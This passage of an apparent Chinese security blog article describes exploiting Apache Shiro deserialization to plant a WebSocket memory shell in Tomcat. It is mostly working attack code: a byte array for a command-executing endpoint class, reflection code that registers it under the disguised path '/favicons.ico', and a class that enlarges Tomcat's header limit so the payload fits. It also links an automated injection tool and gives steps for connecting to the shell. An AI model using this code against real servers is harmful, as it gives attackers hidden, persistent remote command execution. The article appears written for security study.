108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 16, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 1, 0, 4, 82, 79, 79, 84, 1, 0, 18, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 115, 116, 97, 114, 116, 115, 87, 105, 116, 104, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 4, 114, 101, 97, 100, 1, 0, 3, 40, 41, 73, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 28, 40, 67, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 7, 119, 97, 105, 116, 70, 111, 114, 1, 0, 14, 103, 101, 116, 66, 97, 115, 105, 99, 82, 101, 109, 111, 116, 101, 1, 0, 5, 66, 97, 115, 105, 99, 1, 0, 40, 40, 41, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 59, 1, 0, 45, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 7, 0, -97, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 1, 0, 8, 115, 101, 110, 100, 84, 101, 120, 116, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 0, 33, 0, 32, 0, 33, 0, 1, 0, 34, 0, 1, 0, 2, 0, 35, 0, 36, 0, 0, 0, 4, 0, 1, 0, 37, 0, 38, 0, 1, 0, 39, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 42, 0, 43, 0, 0, 0, 1, 0, 44, 0, 45, 0, 2, 0, 39, 0, 0, 0, 86, 0, 2, 0, 3, 0, 0, 0, 16, 42, 43, -75, 0, 2, 42, -76, 0, 2, 42, -71, 0, 3, 2, 0, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 14, 0, 3, 0, 0, 0, 15, 0, 5, 0, 16, 0, 15, 0, 17, 0, 41, 0, 0, 0, 32, 0, 3, 0, 0, 0, 16, 0, 42, 0, 43, 0, 0, 0, 0, 0, 16, 0, 35, 0, 36, 0, 1, 0, 0, 0, 16, 0, 46, 0, 47, 0, 2, 0, 48, 0, 0, 0, 9, 2, 0, 35, 0, 0, 0, 46, 0, 0, 0, 1, 0, 49, 0, 50, 0, 2, 0, 39, 0, 0, 1, -67, 0, 5, 0, 7, 0, 0, 0, -79, 18, 4, -72, 0, 5, -78, 0, 6, -74, 0, 7, 18, 8, -74, 0, 9, 61, 28, -103, 0, 31, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, -89, 0, 28, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, 45, -74, 0, 15, 58, 4, -69, 0, 16, 89, -73, 0, 17, 58, 5, 25, 4, -74, 0, 18, 89, 54, 6, 2, -97, 0, 15, 25, 5, 21, 6, -110, -74, 0, 19, 87, -89, -1, -21, 25, 4, -74, 0, 20, 45, -74, 0, 21, 87, 42, -76, 0, 2, -71, 0, 22, 1, 0, -69, 0, 16, 89, -73, 0, 17, 18, 23, -74, 0, 24, 25, 5, -74, 0, 25, -74, 0, 24, -74, 0, 25, -71, 0, 26, 2, 0, -89, 0, 16, 77, 44, -74, 0, 28, -89, 0, 8, 77, 44, -74, 0, 30, -79, 0, 2, 0, 0, 0, -96, 0, -93, 0, 27, 0, 0, 0, -96, 0, -85, 0, 29, 0, 3, 0, 40, 0, 0, 0, 74, 0, 18, 0, 0, 0, 22, 0, 17, 0, 24, 0, 21, 0, 25, 0, 49, 0, 27, 0, 74, 0, 30, 0, 80, 0, 31, 0, 89, 0, 33, 0, 101, 0, 34, 0, 113, 0, 36, 0, 118, 0, 37, 0, 123, 0, 38, 0, -96, 0, 43, 0, -93, 0, 39, 0, -92, 0, 40, 0, -88, 0, 43, 0, -85, 0, 41, 0, -84, 0, 42, 0, -80, 0, 44, 0, 41, 0, 0, 0, 102, 0, 10, 0, 46, 0, 3, 0, 51, 0, 52, 0, 3, 0, 17, 0, -113, 0, 53, 0, 54, 0, 2, 0, 74, 0, 86, 0, 51, 0, 52, 0, 3, 0, 80, 0, 80, 0, 55, 0, 56, 0, 4, 0, 89, 0, 71, 0, 57, 0, 58, 0, 5, 0, 97, 0, 63, 0, 59, 0, 60, 0, 6, 0, -92, 0, 4, 0, 61, 0, 62, 0, 2, 0, -84, 0, 4, 0, 61, 0, 63, 0, 2, 0, 0, 0, -79, 0, 42, 0, 43, 0, 0, 0, 0, 0, -79, 0, 64, 0, 65, 0, 1, 0, 66, 0, 0, 0, 46, 0, 7, -4, 0, 49, 1, -4, 0, 24, 7, 0, 67, -3, 0, 14, 7, 0, 68, 7, 0, 69, -4, 0, 23, 1, -1, 0, 49, 0, 2, 7, 0, 70, 7, 0, 71, 0, 1, 7, 0, 72, 71, 7, 0, 73, 4, 0, 48, 0, 0, 0, 5, 1, 0, 64, 0, 0, 16, 65, 0, 49, 0, 74, 0, 2, 0, 39, 0, 0, 0, 51, 0, 2, 0, 2, 0, 0, 0, 9, 42, 43, -64, 0, 11, -74, 0, 31, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 42, 0, 43, 0, 0, 0, 48, 0, 0, 0, 5, 1, 0, 64, 16, 0, 0, 3, 0, 75, 0, 0, 0, 2, 0, 78, 0, 79, 0, 0, 0, 2, 0, 80, 0, 77, 0, 0, 0, 18, 0, 2, 0, 34, 0, 119, 0, 76, 6, 9, 0, 111, 0, -102, 0, -107, 6, 9};
        try {
            Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            method.setAccessible(true);
            clazz = (Class) method.invoke(cl,bytes,0,bytes.length);//获取到字节码的Class
                /*
                        获取当前的StandardContext
                        通过StandardContext获取ServerContainer
                        定义一个恶意类,并创建一个ServerEndpointConfig,给这个恶意类分配URI path
                        调用ServerContainer.addEndpoint方法,将创建的ServerEndpointConfig添加进去
                */
            String urlPath = "/favicons.ico";
            ServerEndpointConfig config = ServerEndpointConfig.Builder.create(clazz,urlPath).build();
            WsServerContainer container = (WsServerContainer) standardContext.getServletContext().getAttribute(ServerContainer.class.getName());
            if(container.findMapping(urlPath)==null){
                container.addEndpoint(config);
            }
        } catch (NoSuchMethodException | IllegalAccessException | InvocationTargetException e) {
            e.printStackTrace();
        } catch (DeploymentException e) {
            e.printStackTrace();
        }


    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

这里直接加载该类,并放到_bytecodes中,其实就是CC3链的前半部分,后面就是CB链的代码

1687679791_6497f32f7c3de031a672d.png!small

最后在进行一下加密,这里就不用多说了吧

1687679887_6497f38f5f33f1094586c.png!small

但是众所周知的一个问题就是,shiro的header长度检测,所以这里拿出师傅们的之前分享的代码,修改header头大小

package com;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

@SuppressWarnings("all")
public class TomcatHeaderSize extends AbstractTranslet {

    static {
        try {
            java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
            java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
            java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
            java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");
            java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);
            contextField.setAccessible(true);
            headerSizeField.setAccessible(true);
            serviceField.setAccessible(true);
            requestField.setAccessible(true);
            getHandlerMethod.setAccessible(true);
            org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
                    (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
            org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
            org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
            for (int i = 0; i < connectors.length; i++) {
                if (4 == connectors[i].getScheme().length()) {
                    org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
                    if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
                        Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
                        for (int j = 0; j < classes.length; j++) {
                            // org.apache.coyote.AbstractProtocol$ConnectionHandler
                            if (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {
                                java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
                                java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
                                globalField.setAccessible(true);
                                processorsField.setAccessible(true);
                                org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, null));
                                java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
                                for (int k = 0; k < list.size(); k++) {
                                    org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
                                    // 10000 为修改后的 headersize
                                    headerSizeField.set(tempRequest.getInputBuffer(),409600000);
                                }
                            }
                        }
                        // 10000 为修改后的 headersize
                        ((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(409600000);
                    }
                }
            }
        } catch (Exception e) {
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

接着整理一下过程:修改headersize大小--->将CB链生成出来并进行一次加密

为了方便,本人就直接写成了小工具,大家可以自行研究,主要就是将前面本人所讲的,进行了一个自动化的利用

https://gitee.com/state123/shiro_-web-socket/tree/master

1687680450_6497f5c22ba1b5061e40c.png!small

直接注入成功,此小工具包含了自动修改headersize,自动注入WebSocket内存马,当然肯定不能和专业工具比较,像一些其它的利用链,以及key的话,大家可以自行修改。

1687680450_6497f5c2254848d76fc45.png!small

目前WebSocket内存马打入进去了,但是如何连接呢?

直接使用wscat工具即可,切记,这里的协议要由大家熟知的http://改为ws://

1687680694_6497f6b61e835efa8c9bd.png!small

一些结尾话

如果没看过shiro漏洞的话,可以看本人之前的文章

https://www.freebuf.com/articles/web/331961.html

至于wscat可以自行在网上下载安装,该工具要依赖node.js环境,记得一并安装好

本文中本人提供了一款工具,此工具只供大家学习参考用!一切后果皆和本人无关!

如果看着实在太复杂,可以去看一下websocket内存马,在看完websocket内存马在学习shiro websocket内存马注入,其实差别不是很大

https://blog.csdn.net/qq_53263789/article/details/126224860

# 漏洞分析 # JAVA安全 # 内存马
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录